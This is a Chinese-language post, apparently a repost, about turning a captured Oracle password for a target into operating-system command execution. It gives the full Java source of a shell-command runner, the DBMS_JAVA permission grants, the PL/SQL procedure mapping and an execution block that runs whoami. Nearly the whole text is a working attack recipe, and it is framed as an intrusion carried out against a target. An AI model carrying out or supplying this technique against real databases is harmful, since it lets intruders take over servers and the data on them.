Oracle 执行 Linux 命令

admin

原文地址：https://secvul.com/topics/793.html


某日获取到目标1521密码,接下来就直接RCE，记录下过程。
1、navicat 连上后，建立一个 java.

1. import java.io.*;
   
2. public class Host {
   
3. public static void executeCommand(String command) {
   
4. try {
   
5. finalCommand = new String[3];
   
6. finalCommand[0] = "/bin/sh";
   
7. finalCommand[1] = "-c";
   
8. finalCommand[2] = command;
   
9. Process pr = Runtime.getRuntime().exec(finalCommand);
   
10. pr.waitFor();
    
11. new Thread(new Runnable(){
    
12. public void run() {
    
13. BufferedReader br_in = null;
    
14. try {
    
15. br_in = new BufferedReader(new InputStreamReader(pr.getInputStream()));
    
16. String buff = null;
    
17. while ((buff = br_in.readLine()) != null) {
    
18. System.out.println("Process out :" + buff);
    
19. try {Thread.sleep(100); } catch(Exception e) {}
    
20. }
    
21. br_in.close();
    
22. }
    
23. catch (IOException ioe) {
    
24. System.out.println("Exception caught printing process output.");
    
25. ioe.printStackTrace();
    
26. }
    
27. finally {
    
28. try {
    
29. br_in.close();
    
30. } catch (Exception ex) {}
    
31. }
    
32. }
    
33. }).start();
    
34. 
    
35. new Thread(new Runnable(){
    
36. public void run() {
    
37. BufferedReader br_err = null;
    
38. try {
    
39. br_err = new BufferedReader(new InputStreamReader(pr.getErrorStream()));
    
40. String buff = null;
    
41. while ((buff = br_err.readLine()) != null) {
    
42. System.out.println("Process err :" + buff);
    
43. try {Thread.sleep(100); } catch(Exception e) {}
    
44. }
    
45. br_err.close();
    
46. }
    
47. catch (IOException ioe) {
    
48. System.out.println("Exception caught printing process error.");
    
49. ioe.printStackTrace();
    
50. }
    
51. finally {
    
52. try {
    
53. br_err.close();
    
54. } catch (Exception ex) {}
    
55. }
    
56. }
    
57. }).start();
    
58. }
    
59. catch (Exception ex) {
    
60. System.out.println(ex.getLocalizedMessage());
    
61. }
    
62. }
    
63. 
    
64. public static boolean isWindows() {
    
65. if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
    
66. return true;
    
67. else
    
68. return false;
    
69. }
    
70. };

复制代码

2、新建查询，给数据库用户授权

1. declare
   
2. begin
   
3. DBMS_JAVA.grant_permission('数据库用户','java.io.FilePermission', '<<ALL FILES>>', 'read ,write, execute,delete');
   
4. Dbms_Java.Grant_Permission('数据库用户','SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');
   
5. Dbms_Java.Grant_Permission('数据库用户','SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');
   
6. end;

复制代码

3、建立映射过程

1. CREATE OR REPLACE PROCEDURE host_command (p_command IN VARCHAR2)
   
2. 
   
3. AS LANGUAGE JAVA
   
4. 
   
5. NAME'类名.executeCommand (java.lang.String)';

复制代码

4、执行命令

1. DECLARE
   
2. 
   
3. l_output DBMS_OUTPUT.chararr;
   
4. 
   
5. l_lines INTEGER := 1000;
   
6. 
   
7. BEGIN
   
8. 
   
9. DBMS_OUTPUT.enable(1000000);
   
10. 
    
11. DBMS_JAVA.set_output(1000000);
    
12. 
    
13. host_command('/usr/bin/whoami'); --执行显示目录的命令
    
14. 
    
15. DBMS_OUTPUT.get_lines(l_output, l_lines);
    
16. 
    
17. FOR i IN 1 .. l_lines LOOP
    
18. 
    
19. DBMS_OUTPUT.put_line(l_output(i));
    
20. 
    
21. NULL;
    
22. 
    
23. END LOOP;
    
24. 
    
25. END;

复制代码